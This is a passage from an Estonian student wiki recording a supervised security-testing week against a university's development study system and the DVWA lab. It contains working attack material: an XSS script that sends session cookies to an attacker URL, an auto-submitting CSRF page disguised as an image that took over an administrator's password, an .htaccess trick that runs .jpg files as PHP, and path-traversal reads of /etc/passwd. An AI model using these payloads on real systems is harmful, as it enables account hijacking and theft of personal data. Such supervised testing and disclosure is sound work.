Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:53:14Z

Ulihten: /* Alo tegevus */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm

http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting

http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting

http://www.youtube.com/watch?v=SG1cvGQ971g

http://www.isecom.org/research.html

http://evuln.com/tools/

http://sectools.org/tag/web-scanners/

http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/

http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:

Cross-Site Scripting (XSS)

SQL Injection (blind test)

File inclusion

Code Execution

LDAP Injection

Cross Frame Scripting

SQL Injection (error msg. test)

CRLF Injection

Directory Travelsal

XPath Injection

URL Redirection

Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
